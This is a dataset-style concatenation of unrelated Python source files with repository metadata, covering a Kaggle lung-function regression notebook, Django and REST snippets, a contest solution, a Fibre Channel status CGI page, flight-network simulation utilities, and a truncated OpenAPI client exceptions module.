# In[81]:
PATH_dicom = os.path.abspath(os.path.join('D:/Kaggle/Pulmonary Fibrosis', 'Train_jpg'))
# In[82]:
images_dicom = glob(os.path.join(PATH_dicom, "*.jpg"))
# In[83]:
images_dicom[0:5]
# In[84]:
images_dicom[0:5]
# In[85]:
r = random.sample(images_dicom, 3)
r
# In[86]:
plt.figure(figsize=(16,16))
plt.subplot(131)
plt.imshow(cv2.imread(r[0]))
plt.subplot(132)
plt.imshow(cv2.imread(r[1]))
plt.subplot(133)
plt.imshow(cv2.imread(r[2]));
# In[87]:
get_ipython().run_line_magic('pwd', '')
# In[88]:
submission = pd.read_csv('sample_submission.csv')
# In[89]:
train.drop_duplicates(keep=False, inplace=True, subset=['Patient','Weeks'])
# In[90]:
train
# In[91]:
submission
# In[92]:
submission['Patient'] = (
submission['Patient_Week']
.apply(
lambda x:x.split('_')[0]
)
)
submission['Weeks'] = (
submission['Patient_Week']
.apply(
lambda x: int(x.split('_')[-1])
)
)
submission = submission[['Patient','Weeks','FVC', 'Confidence','Patient_Week']]
submission = submission.merge(test.drop('Weeks', axis=1), on="Patient")
# In[93]:
submission
# In[97]:
test
# In[98]:
train['Dataset'] = 'train'
test['Dataset'] = 'test'
submission['Dataset'] = 'submission'
# In[99]:
submission
# In[100]:
all_data = train.append([test, submission])
all_data = all_data.reset_index()
all_data = all_data.drop(columns=['index'])
# In[101]:
all_data.head()
# In[102]:
all_data['FirstWeek'] = all_data['Weeks']
all_data.loc[all_data.Dataset=='submission','FirstWeek'] = np.nan
all_data['FirstWeek'] = all_data.groupby('Patient')['FirstWeek'].transform('min')
# In[103]:
first_fvc = (
all_data
.loc[all_data.Weeks == all_data.FirstWeek][['Patient','FVC']]
.rename({'FVC': 'FirstFVC'}, axis=1)
.groupby('Patient')
.first()
.reset_index()
)
all_data = all_data.merge(first_fvc, on='Patient', how='left')
# In[104]:
all_data.head()
# In[105]:
all_data
# In[106]:
all_data['WeeksPassed'] = all_data['Weeks'] - all_data['FirstWeek']
# In[107]:
all_data
# In[108]:
#Calculating derived field of height from First FVC value
# Reference - https://en.wikipedia.org/wiki/Vital_capacity#:~:text=It%20is%20equal%20to%20the,a%20wet%20or%20regular%20spirometer
def calculate_height(row):
if row['Sex'] == 'Male':
return row['FirstFVC'] / (27.63 - 0.112 * row['Age'])
else:
return row['FirstFVC'] / (21.78 - 0.101 * row['Age'])
all_data['Height'] = all_data.apply(calculate_height, axis=1)
# In[109]:
all_data.head()
# In[110]:
all_data = pd.concat([
all_data,
pd.get_dummies(all_data.Sex),
pd.get_dummies(all_data.SmokingStatus)
], axis=1)
all_data = all_data.drop(columns=['Sex', 'SmokingStatus'])
# In[111]:
all_data.head()
# In[112]:
def scale_feature(series):
return (series - series.min()) / (series.max() - series.min())
all_data['Percent'] = scale_feature(all_data['Percent'])
all_data['Age'] = scale_feature(all_data['Age'])
all_data['FirstWeek'] = scale_feature(all_data['FirstWeek'])
all_data['FirstFVC'] = scale_feature(all_data['FirstFVC'])
all_data['WeeksPassed'] = scale_feature(all_data['WeeksPassed'])
all_data['Height'] = scale_feature(all_data['Height'])
# In[113]:
feature_columns = [
'Percent',
'Age',
'FirstWeek',
'FirstFVC',
'WeeksPassed',
'Height',
'Female',
'Male',
'Currently smokes',
'Ex-smoker',
'Never smoked',
]
# In[114]:
train_new = all_data.loc[all_data.Dataset == 'train']
test_new = all_data.loc[all_data.Dataset == 'test']
submission_new = all_data.loc[all_data.Dataset == 'submission']
# In[115]:
train_new[feature_columns].head()
# In[116]:
train_new
# In[117]:
import sklearn
from sklearn import linear_model
# In[118]:
model = linear_model.LinearRegression()
# In[119]:
model.fit(train_new[feature_columns], train_new['FVC'])
# In[120]:
plt.bar(train_new[feature_columns].columns.values, model.coef_)
plt.xticks(rotation=90)
plt.show()
# In[121]:
from sklearn import linear_model, ensemble
from sklearn.metrics import mean_squared_error, mean_absolute_error
# In[122]:
predictions = model.predict(train_new[feature_columns])
mse = mean_squared_error(
train['FVC'],
predictions,
squared=False
)
mae = mean_absolute_error(
train['FVC'],
predictions
)
print('MSE Loss: {0:.2f}'.format(mse))
print('MAE Loss: {0:.2f}'.format(mae))
# In[123]:
print (model.coef_)
# In[124]:
print (model.intercept_)
# In[125]:
# Rsquare value for the model
model.score(train_new[feature_columns], train_new['FVC'])
# In[126]:
X = train_new[feature_columns]
# In[127]:
Y = train_new['FVC']
# In[128]:
X
# In[129]:
import statsmodels.formula.api as smf
# In[130]:
model_smf_1 = smf.ols(formula='Y~X',data = train_new).fit()
# In[131]:
train_new['prediction'] = predictions
# In[132]:
predictions
# In[133]:
model_smf_1.params
# In[134]:
prediction_smf = model_smf_1.predict(train_new[feature_columns])
# In[135]:
model_smf_1.summary()
# In[136]:
prediction_smf
# In[137]:
predictions
# In[138]:
prds_1_sklearn = pd.DataFrame(predictions)
# In[139]:
prds_1_sklearn
# In[140]:
prds_2_statstools = pd.DataFrame(prediction_smf)
# In[141]:
prds_2_statstools
# In[142]:
plt.scatter(predictions, train_new['FVC'])
plt.xlabel('predictions')
plt.ylabel('FVC (labels)')
plt.show()
# In[143]:
delta = predictions - train_new['FVC']
plt.hist(delta, bins=20)
plt.show()
# In[144]:
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
# In[145]:
train_patients = train_new.Patient.unique()
# In[146]:
fig, ax = plt.subplots(10, 1, figsize=(10, 20))
for i in range(10):
patient_log = train_new[train_new['Patient'] == train_patients[i]]
ax[i].set_title(train_patients[i])
ax[i].plot(patient_log['WeeksPassed'], patient_log['FVC'], label='truth')
ax[i].plot(patient_log['WeeksPassed'], patient_log['prediction'], label='prediction')
ax[i].legend()
# In[149]:
submission_new
train_new
# In[152]:
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestRegressor
from sklearn import metrics
get_ipython().run_line_magic('matplotlib', 'inline')
# In[153]:
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.3, random_state=0)
# In[154]:
#Create a Gaussian Classifier
regr=RandomForestRegressor(random_state=0)
#Train the model using the training sets Y_pred=clf.predict(X_test)
regr.fit(X_train,Y_train)
# In[155]:
regr.n_estimators
# In[156]:
regr.estimators_[5]
# In[157]:
regr.get_params()
# In[158]:
regr.feature_importances_
# In[162]:
Y_pred = regr.predict(X_test)
# In[163]:
df = pd.DataFrame({'Actual': Y_test, 'Predicted': Y_pred})
df
# In[164]:
df1 = df.head(50)
df1.plot(kind='bar',figsize=(16,10))
plt.grid(which='major', linestyle='-', linewidth='0.5', color='green')
plt.grid(which='minor', linestyle=':', linewidth='0.5', color='black')
plt.show()
# In[165]:
import os
os.environ["PATH"] += os.pathsep + 'C:/Program Files (x86)/Graphviz2.38/bin/'
# In[166]:
from sklearn.tree import export_graphviz
import pydot
# In[167]:
tree = regr.estimators_[5]
# In[168]:
export_graphviz(tree,out_file = 'tree.dot',
feature_names = X.columns,
filled = True,
rounded = True,precision = 1)
# In[169]:
(graph, ) = pydot.graph_from_dot_file('tree.dot')
# In[170]:
graph
# In[171]:
import os
os.environ["PATH"] += os.pathsep + 'C:/Program Files (x86)/Graphviz2.38/bin/'
# In[172]:
graph.write_png('tree_graph.png')
# In[173]:
errors_test = abs(Y_pred - Y_test)
# In[174]:
# Display the performance metrics
print('Mean Absolute Error:', round(np.mean(errors_test), 2), 'degrees.')
mape = np.mean(100 * (errors_test / Y_test))
accuracy = 100 - mape
print('Accuracy:', round(accuracy, 2), '%.')
# In[175]:
Y_pred_train=regr.predict(X_train)
# In[176]:
df2 = pd.DataFrame({'Actual': Y_train, 'Predicted': Y_pred_train})
df2
# In[177]:
df3 = df2.head(50)
df3.plot(kind='bar',figsize=(16,10))
plt.grid(which='major', linestyle='-', linewidth='0.5', color='green')
plt.grid(which='minor', linestyle=':', linewidth='0.5', color='black')
plt.show()
# In[178]:
errors_train = abs(Y_pred_train - Y_train)
# In[179]:
# Display the performance metrics
print('Mean Absolute Error:', round(np.mean(errors_train), 2), 'degrees.')
mape_train = np.mean(100 * (errors_train / Y_train))
accuracy_train = 100 - mape_train
print('Accuracy:', round(accuracy_train, 2), '%.')
# In[234]:
import cv2
import os
import random
import matplotlib.pylab as plt
from glob import glob
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
# In[248]:
files_jpg = Path('D:/Kaggle/Pulmonary Fibrosis/Train_jpg1')
# In[250]:
images_jpg = glob(os.path.join(files_jpg, "*.jpg"))
# In[249]:
files_jpg
# In[252]:
images_jpg
# In[253]:
r_jpg = random.sample(images_jpg, 3)
r_jpg
# Matplotlib black magic
plt.figure(figsize=(16,16))
plt.subplot(131)
plt.imshow(cv2.imread(r_jpg[0]))
plt.subplot(132)
plt.imshow(cv2.imread(r_jpg[1]))
plt.subplot(133)
plt.imshow(cv2.imread(r_jpg[2]));
# In[255]:
def proc_images():
"""
Returns two arrays:
x is an array of resized images
"""
x = [] # images as arrays
WIDTH = 64
HEIGHT = 64
for img in images_jpg:
base = os.path.basename(images_jpg)
# Read and resize image
full_size_image = cv2.imread(images_jpg)
x.append(cv2.resize(full_size_image, (WIDTH,HEIGHT), interpolation=cv2.INTER_CUBIC))
return x
# In[261]:
from PIL import Image
# In[267]:
IMG_DIR = 'D:/Kaggle/Pulmonary Fibrosis/Train_jpg1'
for img in os.listdir(IMG_DIR):
img_array = cv2.imread(os.path.join(IMG_DIR,img), cv2.IMREAD_GRAYSCALE)
img_array = (img_array.flatten())
img_array = img_array.reshape(-1, 1).T
print(img_array)
with open('output.csv', 'ab') as f:
np.savetxt(f, img_array, delimiter=",")
# In[281]:
img_array.shape
# In[279]:
os.listdir(IMG_DIR)
# In[278]:
img
# In[ ]:
| [
"noreply@github.com"
] | vikram-sreedhar.noreply@github.com |
b2d0b95a6c5ee67ad0f1af6a3d34aaa04e489b4c | 25297ce593e7b5d8c7035f5992fd38538e8a4b6d | /ecom/api/order/urls.py | 47d94c48d82bb40e3382f9a0b258f2eae19c2d76 | [] | no_license | abhishek0405/MaskBazaar | fb2d955ba1fc73a8719cf23b3318972ae7455b7c | 71975fc7ab930859786719579821f6100fe7981d | refs/heads/main | 2023-01-07T13:48:14.201049 | 2020-11-22T14:29:21 | 2020-11-22T14:29:21 | 315,051,042 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 370 | py | from rest_framework import routers
from django.urls import path, include
from . import views
router = routers.DefaultRouter()
router.register(r'',views.OrderViewSet) #'' as this invoked only when /api/product so no need to add extra
urlpatterns =[
path('add/<str:id>/<str:token>',views.add,name='order.add'),
path('',include(router.urls))#the one defined above
] | [
"abhishekanantharam123@gmail.com"
] | abhishekanantharam123@gmail.com |
2a6ed3ab36186dc4b2907c6eccfff147841622dd | bc28f8fe941caf281261afa1641868e743ecb5ab | /Google_APAC_Round_E/Beautiful_Numbers/Beautiful_Numbers.py | 07ce6d570af05b0e1e80e6cd90d4524fcd142a89 | [] | no_license | anubhavshrimal/CompetitiveProgrammingInPython | 9fc6949fb3cd715cfa8544c17a63ffbe52677b37 | 2692c446d49ec62d4967ed78a7973400db7ce981 | refs/heads/master | 2021-07-05T08:17:15.182154 | 2018-05-29T02:26:25 | 2018-05-29T02:26:25 | 60,554,340 | 7 | 6 | null | 2021-05-24T17:46:16 | 2016-06-06T19:18:27 | Python | UTF-8 | Python | false | false | 465 | py | import numpy as np
test = int(input())
for t in range(1, test+1):
num = int(input())
n1, n2 = abs(np.roots([1, 1, -(num-1)]))
if int(n1) != n1 or int(n2)!= n2:
ans = num-1
else:
if n1 == 1 or n1 == -1:
ans = n2
elif n2 == 1 or n2 == -1:
ans = n1
else:
if n2 > n1:
ans = n1
else:
ans = n2
print('Case #'+str(t)+':',str(int(ans)))
| [
"anubhavshrimal@gmail.com"
] | anubhavshrimal@gmail.com |
923b0ab9979233ab582fe107d680fdaa2f83e04e | f6a639ad7782fa5e05905224e01aeefc7204a66f | /punto_2/animacion.py | 34e80f3465c84af1886dff168d53833977c71bf2 | [] | no_license | Angelicarjs/AngelicaMoreno_taller5 | 16b62ffd750f4ee1fb475e66be359cb63fd58441 | a0cb6164ee6f017f0c67004500d0f48b15e11ee3 | refs/heads/master | 2020-03-12T08:16:02.383897 | 2018-05-14T22:00:53 | 2018-05-14T22:00:53 | 130,523,842 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 271 | py | import numpy as np
import matplotlib.pyplot as plt
from matplotlib import animation
#Importa datos
data = np.loadtxt('cuerda.txt')
x = data[0,:]
y = data[1,:]
fig, ax = plt.subplots()
#Dimensiones en x y y de la grafica
ax.set_xlim(( 0, 100))
ax.set_ylim((-5, 1))
| [
"noreply@github.com"
] | Angelicarjs.noreply@github.com |
686ebbced947976bbb1149d1b104178043ff8612 | aafb41aab45562dfe08b2f142025a670dc4c5b80 | /scripts/ffhs-na-semesterarbeit/utils/utils.py | 376cc2c16a15cfccf108bd3c70e5d083df74c7b1 | [] | no_license | samuelblattner/ffhs-na-semesterarbeit | 1a61b55b60793557dd9b5d3b9ab025e8869fcbbd | c59d878806ab53fbc91b8861e820c1956f344fb3 | refs/heads/master | 2020-04-09T23:39:09.285217 | 2018-12-06T22:41:47 | 2018-12-06T22:41:47 | 160,662,796 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,179 | py | from random import random
from typing import Tuple, List, Dict
from dateutil import parser
EUROPEAN_COUNTRIES = (
'Albania',
'Andorra',
'Austria',
'Belarus',
'Belgium',
'Bosnia and Herzegovina',
'Bulgaria',
'Croatia',
'Czech Republic',
'Denmark',
'Estonia',
'Finland',
'France',
'Germany',
'Greece',
'Hungary',
'Iceland',
'Ireland',
'Italy',
'Latvia',
'Liechtenstein',
'Lithuania',
'Luxembourg',
'Malta',
'Moldova',
'Monaco',
'Netherlands',
'Norway',
'Poland',
'Portugal',
'Romania',
'Russia',
'San Marino',
'Serbia',
'Slovakia',
'Slovenia',
'Spain',
'Sweden',
'Switzerland',
'Ukraine',
'United Kingdom',
)
import sys
from datetime import datetime, timedelta
from math import radians, atan2, sqrt, cos, sin
import networkx as nx
from dateutil.tz import gettz
def calculate_distance_from_coordinates(lat1, lng1, lat2, lng2):
r = 6371.0
rad_lat1 = radians(lat1)
rad_lng1 = radians(lng1)
rad_lat2 = radians(lat2)
rad_lng2 = radians(lng2)
dlat = rad_lat2 - rad_lat1
dlng = rad_lng2 - rad_lng1
a = (sin(dlat / 2) ** 2) + (cos(rad_lat1) * cos(rad_lat2)) * (sin(dlng / 2) ** 2)
c = 2 * atan2(sqrt(a), sqrt(1 - a))
return r * c
def calculate_flight_duration_per_distance(network: nx.MultiDiGraph):
durations_per_km = []
for from_airport in network.nodes():
for f, t, k in network.out_edges(from_airport, keys=True):
if f == t:
continue
from_data = network.nodes[f]
to_data = network.nodes[t]
try:
dist = calculate_distance_from_coordinates(
from_data.get('latitude'),
from_data.get('longitude'),
to_data.get('latitude'),
to_data.get('longitude'),
)
except:
continue
flight_time = network.edges[f, t, k].get('duration')
durations_per_km.append(flight_time / dist)
return sum(durations_per_km) / len(durations_per_km)
def calculate_hub_attachment_likelihood(network: nx.MultiDiGraph, from_airport, to_airport):
p = 0.5
num_out_edges = len(network.out_edges(from_airport))
num_links1 = network.get_edge_data(from_airport, to_airport)
num_links1 = len(num_links1) if num_links1 else 0
num_links2 = network.get_edge_data(to_airport, from_airport)
num_links2 = len(num_links2) if num_links2 else 0
num_shared_edges = num_links1 + num_links2
return p * 1/network.number_of_nodes() + (1-p) * num_shared_edges / (1+num_out_edges)
def calculate_hub_neighbor_attachment_likelihood(network, from_airport, to_airport):
p = 0.2
# Find hubs that connect from and to airports
from_neighbors = set([t for f, t, k in network.out_edges(from_airport, keys=True)])
to_neighbors = set([t for f, t, k in network.out_edges(to_airport, keys=True)])
common_hubs = from_neighbors.intersection(to_neighbors)
random_connectivity = p * 1/network.number_of_nodes()
if len(common_hubs) == 0:
return random_connectivity
all_to_hub_strengths = []
for common_hub in common_hubs:
num_links1 = network.get_edge_data(from_airport, common_hub)
num_links1 = len(num_links1) if num_links1 else 0
num_links2 = network.get_edge_data(common_hub, from_airport)
num_links2 = len(num_links2) if num_links2 else 0
all_to_hub_strengths.append((
num_links1 + num_links2,
common_hub
))
strength, strongest_hub = sorted(all_to_hub_strengths, key=lambda hn: hn[0], reverse=True)[0]
existing_direct_routes1 = network.get_edge_data(from_airport, to_airport)
existing_direct_routes1 = len(existing_direct_routes1) if existing_direct_routes1 else 0
existing_direct_routes2 = network.get_edge_data(to_airport, from_airport)
existing_direct_routes2 = len(existing_direct_routes2) if existing_direct_routes2 else 0
existing_direct_routes = existing_direct_routes1 + existing_direct_routes2
neighbor_connectivity = (1-p) * (1 / ((1 + existing_direct_routes)**5)) * (strength / sum([s[0] for s in all_to_hub_strengths]))
return random_connectivity + neighbor_connectivity
def calculate_non_hub_connectivity(network: nx.MultiDiGraph, from_airport, to_airport):
p = 0.2
return p * 1/network.number_of_nodes() + (1-p) * 1/((network.degree(to_airport) + 1)**2)
def grow_traffic_by_x_years(network: nx.MultiDiGraph, years, growth_rate, duration_per_km, preferential_attachment=None):
num_of_edges = len(network.edges)
prospect_num_of_edges = num_of_edges * (growth_rate**years)
num_additional_edges = int(prospect_num_of_edges) - num_of_edges
DIST_CACHE = {}
num_distributed_new_edges = 0
while num_distributed_new_edges < num_additional_edges:
for fn, from_airport in enumerate(network.nodes()):
if num_distributed_new_edges >= num_additional_edges:
return
sys.stdout.write('\rDistributed: {} of {} new links'.format(num_distributed_new_edges, num_additional_edges))
for to_airport in network.nodes():
if num_distributed_new_edges >= num_additional_edges:
return
# Avoid connections to self
if from_airport == to_airport:
continue
if preferential_attachment == 'HUB':
p = calculate_hub_attachment_likelihood(network, from_airport, to_airport)
if random() > p:
continue
elif preferential_attachment == 'NEIGHBOR':
p = calculate_hub_neighbor_attachment_likelihood(network, from_airport, to_airport)
# sys.stdout.write('\rP: {} '.format(p))
if random() > p:
continue
elif preferential_attachment == 'NONHUB':
p = calculate_non_hub_connectivity(network, from_airport, to_airport)
# sys.stdout.write('\rP: {} '.format(p))
if random() > p:
continue
from_airport_obj = network.nodes[from_airport]
to_airport_obj = network.nodes[to_airport]
# Check existing connections between the airports.
# If there are any, we can just use their flight duration
for ef, et, ek in network.out_edges([from_airport, to_airport], keys=True):
if ef == from_airport and et == to_airport or ef == to_airport and et == to_airport:
flight_duration_in_min = network.edges[ef, et, ek].get('duration')
break
# If no connections exist yet
else:
distance = DIST_CACHE.get(from_airport, {}).get(to_airport, None)
if distance is None:
distance = calculate_distance_from_coordinates(
lat1=from_airport_obj.get('latitude'),
lng1=from_airport_obj.get('longitude'),
lat2=to_airport_obj.get('latitude'),
lng2=to_airport_obj.get('longitude')
)
DIST_CACHE.setdefault(from_airport, {to_airport: distance})
DIST_CACHE.setdefault(to_airport, {from_airport: distance})
flight_duration_in_min = int(distance * duration_per_km / 60)
utc_dep_time = datetime.strptime('{}:{}:00'.format(5 + int(15 * random()), int(12*random()) * 5), '%H:%M:%S').replace(
tzinfo=gettz(network.nodes[from_airport].get('timezone'))).astimezone()
utc_arr_time = utc_dep_time + timedelta(minutes=flight_duration_in_min)
network.add_edge(from_airport, to_airport, **{
'departureTimeUTC': utc_dep_time.strftime('%H:%M:%S'),
'arrivalTimeUTC': utc_arr_time.strftime('%H:%M:%S'),
'duration': flight_duration_in_min * 60
})
num_distributed_new_edges += 1
def create_flight_departures_arrivals_index(network) -> Tuple[Dict, Dict]:
"""
Creates two indices where arrivals and departures are collected by minute.
This helps to prevent the simulation from analyzing all flights for every
simulation step (minute) and thus reduces total simulation time greatly.
:param network:
:return:
"""
dep_index = {}
arr_index = {}
ins = 0
for node in network.nodes():
for f, t, k in network.out_edges(node, keys=True):
outbound_flight_data = network.edges[f, t, k]
scheduled_departure_utc = parser.parse(outbound_flight_data['departureTimeUTC']).time()
scheduled_departure_utc = scheduled_departure_utc.hour * 60 + scheduled_departure_utc.minute
dep_index.setdefault(scheduled_departure_utc, {}).setdefault(
'{}{}{}'.format(f, t, k),
(outbound_flight_data, f, t)
)
for f, t, k in network.in_edges(node, keys=True):
ins += 1
inbound_flight_data = network.edges[f, t, k]
scheduled_arrival_utc = parser.parse(inbound_flight_data['arrivalTimeUTC']).time()
scheduled_arrival_utc = scheduled_arrival_utc.hour * 60 + scheduled_arrival_utc.minute
arr_index.setdefault(scheduled_arrival_utc, {}).setdefault(
'{}{}{}'.format(f, t, k),
(inbound_flight_data, f, t)
)
return dep_index, arr_index
def create_airport_capacity_load_index(network, capacity_factor=1.2):
cap_index = {}
load_index = {}
for airport in network.nodes():
cap_index.setdefault(airport, {})
for f, t, k in network.out_edges(airport, keys=True):
outbound_flight_data = network.edges[f, t, k]
scheduled_departure_utc = parser.parse(outbound_flight_data['departureTimeUTC']).time()
cap_index[airport].setdefault(scheduled_departure_utc.hour, 0)
cap_index[airport][scheduled_departure_utc.hour] += 1
for f, t, k in network.in_edges(airport, keys=True):
inbound_flight_data = network.edges[f, t, k]
scheduled_arrival_utc = parser.parse(inbound_flight_data['arrivalTimeUTC']).time()
cap_index[airport].setdefault(scheduled_arrival_utc.hour, 0)
cap_index[airport][scheduled_arrival_utc.hour] += 1
max_cap = max(cap_index[airport].values()) if cap_index[airport].values() else 0
if airport == '9908':
print(network.nodes[airport]['codeIcaoAirport'])
print(max_cap)
print(max_cap/60)
cap_index[airport] = capacity_factor * max_cap
load_index[airport] = 0
return cap_index, load_index
def transform_to_random(network, duration_per_km=4.5):
transformed = nx.MultiDiGraph()
all_nodes_keys = list(network.nodes().keys())
num_edges = len(network.edges)
num_edges_added = 0
DIST_CACHE = {}
for node in network.nodes():
transformed.add_node(node, **network.nodes[node])
for f, t, k in network.edges:
# Select from and to airport randomly
from_airport = to_airport = -1
while from_airport == to_airport:
from_airport = all_nodes_keys[int(random() * len(all_nodes_keys))]
to_airport = all_nodes_keys[int(random() * len(all_nodes_keys))]
from_airport_obj = network.nodes[from_airport]
to_airport_obj = network.nodes[to_airport]
# Calculate distance and flight duration between them
distance = DIST_CACHE.get(from_airport, {}).get(to_airport, None)
if distance is None:
distance = calculate_distance_from_coordinates(
lat1=from_airport_obj.get('latitude'),
lng1=from_airport_obj.get('longitude'),
lat2=to_airport_obj.get('latitude'),
lng2=to_airport_obj.get('longitude')
)
DIST_CACHE.setdefault(from_airport, {to_airport: distance})
DIST_CACHE.setdefault(to_airport, {from_airport: distance})
flight_duration_in_min = int(distance * duration_per_km / 60)
# Choose a random departure time during the day
utc_dep_time = parser.parse(network.edges[f, t, k]['departureTimeUTC'])
# Calculate arrival time
utc_arr_time = utc_dep_time + timedelta(minutes=flight_duration_in_min)
# Add flight to new network
transformed.add_edge(
from_airport,
to_airport,
**{
'departureTimeUTC': utc_dep_time.strftime('%H:%M:%S'),
'arrivalTimeUTC': utc_arr_time.strftime('%H:%M:%S'),
'duration': flight_duration_in_min * 60
}
)
num_edges_added += 1
return transformed
| [
"samworks@gmx.net"
] | samworks@gmx.net |
7054d92c14a1e6c568fc15281f3341cce89ae817 | 4c2136ab05913beba890b4127c2f608be4798ed2 | /(0, '')/py/fc_session.py | 751c6d3892c8e00fd0baf22a85673c65224e1427 | [] | no_license | Dyutee/test | 345adcd1769cba0f468090bcc311f4d379ea5f1e | b8b3718922bafbac1bad3802f6c885d777e1bb08 | refs/heads/master | 2021-01-12T04:19:45.511927 | 2016-12-29T07:25:29 | 2016-12-29T07:25:29 | 77,588,025 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,517 | py | #!/usr/bin/python
import cgitb, sys, header, common_methods
cgitb.enable()
sys.path.append('/var/nasexe/storage')
import storage_op
import sys,os
from lvm_infos import *
from functions import *
import san_disk_funs
check_fc = san_disk_funs.fc_target_status();
fc_target=san_disk_funs.fc_list_targets()
fc_ip = ''
ses = ''
########### FC Session ##########################
for session_tar in fc_target:
#print 'Session Target:'+str(session_tar)
#print '<br/>'
#print 'Sess Tar:'+str(session_tar)
#print '<br/>'
ses=san_disk_funs.fc_session(session_tar)
#print 'FC SESSION Info:'+str(sess)
import left_nav
#if (str(check_fc).find("'1'") > 0):
if (check_fc !=[]):
print
print """
<!--Right side body content starts from here-->
<div class="rightsidecontainer">
<div class="insidepage-heading">Fc >> <span class="content">Fc Session Information</span></div>
<!--tab srt-->
<div class="searchresult-container">
<div class="infoheader">
<div id="tabs">
<ul>
<li><a href="#tabs-1">Fc Session</a></li>
</ul>
<div id="tabs-1">
<!--form container starts here-->
<div class="form-container">
<div class="topinputwrap-heading">Fc Session Information </div>
<div class="inputwrap">
<div class="formrightside-content">
<form name = 'add_info' method = 'POST'>
<table width = "680" border = "1" cellspacing = "0" cellpadding = "0" name = 'disp_tables' id = 'id_target_info' style ="border-style:ridge;">"""
print"""<tr style = 'background-color:#999999; font-weight: bold;'>
<td height = "35px" valign = "middle" style = 'color: #FFF;'>Fc Target</td>
<td height = "35px" valign = "middle" style = 'color: #FFF;'>Connected Client</td>
</tr>"""
#print fc_target
if(ses !=''):
for tar_info in fc_target:
print"""<tr>
<!--<td class = "table_content" height = "35px" valign = "middle">
<a href = 'main.php?page=iscsi&act=add_disk_tgt_done&target=<?= $show_targets ?>'><img border = '0' style = 'margin-top: 2px;' src = '../images/add.png' title = 'Add disk to target' /></a> <a href = 'main.php?page=iscsi&act=del_disk_tgt_done&t=<?= $show_targets ?>'><img border = '0' src = '../images/fileclose.png' title = 'Remove disk from target' /></a> <a href = 'get_properties.php?target=<?= $show_targets ?>'><img border = '0' src = '../images/properties.png' title = 'Target properties' /></a> </td>-->
<td class = "table_content" height = "35px" valign = "middle">"""
print""" <font color ="darkred"><b>"""+tar_info+"""</b></font>"""
print """</td>"""
print"""<td class = "table_content" height = "35px" valign = "middle" style="font-family: Tahoma;text-decoration:blink;">"""
sesion_tar =sess=san_disk_funs.fc_session(tar_info)
replace_sess_nm = str(sesion_tar).replace('[]', '')
replace_sess_nm1 = str(replace_sess_nm).replace('[', '')
replace_sess_nm2 = str(replace_sess_nm1).replace(']', '')
replace_session_name = str(replace_sess_nm2).replace("'", '')
#print replace_session_name
if(replace_session_name!=''):
print"""<font color = 'darkgreen'><b>"""+replace_session_name+"""</b></font></td>"""
else:
print """
<marquee behavior="alternate" direction ="right"><b><font size="3">There is no Session for this client</font></b></marquee>
</td>
"""
else:
print"""<tr>
<td colspan = '3' align = 'center' height="50px;">
<marquee behavior="alternate" direction= "right"><b><font size="5">No Information is available</font></b></marquee>
</td>
</tr>"""
print"""
</table>
</form>
</div>"""
print"""
</div>
</div>
<!--form container ends here-->
</div>
</div>
</div>
</div>
<!--form container ends here-->
<!--form container starts here-->
<!--form container ends here-->
</div>
<!--Right side body content ends here-->
</div>
<!--Footer starts from here-->
<div class="insidefooter footer_content">© 2013 Opslag FS2</div>
<!-- Footer ends here-->
</div>
<!--inside body wrapper end-->
</div>"""
else:
print "<div style = 'margin-left: auto; margin-right: auto; text-align: center; vertical-align: center; color: darkred; width: 65%; font: 16px Arial;'><br/><br/><br/><b>Check the 'Enable/Disable FC' option in Maintenance -></b><a href= 'main.py?page=sr'><span style='text-decoration:underline;'>Services</span></a>.</div>"
print"""
<!--body wrapper end-->
</body>
</html>
"""
| [
"dyuteemoy46@gmail.com"
] | dyuteemoy46@gmail.com |
d3c0c2a4b226f7e7de023845098715c9f079029c | 6484cdf98189f5f5736950c81a9d8d30e0f0c0db | /notifications/serializers.py | 488db18520ad943f4fc0b50ec121588e37fe25bd | [] | no_license | AlexFrundin/great_app_example | e0e9c91f06bfba76058f3af5b113a9399945bf6c | 23225e7e88f2ee51359d23cac2200b32b8bd6e20 | refs/heads/main | 2023-05-30T15:02:22.035811 | 2021-06-17T06:40:06 | 2021-06-17T06:40:06 | 339,434,159 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 519 | py | from rest_framework import serializers
from .models import Notification
# This class is use for serialize the data of user profile details
class NoitifcationListSerializer(serializers.ModelSerializer):
created_on = serializers.DateTimeField(format="%d %b %Y")
class Meta:
model = Notification
fields = (
'id',
'refrence_id',
'event_id',
'title',
'message',
'is_read',
'is_deleted',
'created_on')
| [
"aleksey.frundin@gmail.com"
] | aleksey.frundin@gmail.com |
fefa024de214cfeafa5d85b6923b4b92572e46fb | 583c92b827d741f2385560a75de6d125d888be1b | /classics_proxy_client/exceptions.py | 210bd4cd7815f0f358d47f53315b996b6d4cc04d | [] | no_license | kyunghyuncho/classics-proxy-client | 9686e72aae830bfe8072648505419ddc5c18df5a | 5bfaf30106ba5456a5c2787f0cf8a1cacff10a00 | refs/heads/master | 2022-07-01T05:08:22.608264 | 2020-05-11T04:30:45 | 2020-05-11T04:30:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,761 | py | # coding: utf-8
"""
Classics Proxy API
Proxy API for fetching Classic Sino-Korean Literature from various corpora # noqa: E501
The version of the OpenAPI document: 1.0
Generated by: https://openapi-generator.tech
"""
import six
class OpenApiException(Exception):
"""The base exception class for all OpenAPIExceptions"""
class ApiTypeError(OpenApiException, TypeError):
def __init__(self, msg, path_to_item=None, valid_classes=None,
key_type=None):
""" Raises an exception for TypeErrors
Args:
msg (str): the exception message
Keyword Args:
path_to_item (list): a list of keys an indices to get to the
current_item
None if unset
valid_classes (tuple): the primitive classes that current item
should be an instance of
None if unset
key_type (bool): False if our value is a value in a dict
True if it is a key in a dict
False if our item is an item in a list
None if unset
"""
self.path_to_item = path_to_item
self.valid_classes = valid_classes
self.key_type = key_type
full_msg = msg
if path_to_item:
full_msg = "{0} at {1}".format(msg, render_path(path_to_item))
super(ApiTypeError, self).__init__(full_msg)
class ApiValueError(OpenApiException, ValueError):
def __init__(self, msg, path_to_item=None):
"""
Args:
msg (str): the exception message
Keyword Args:
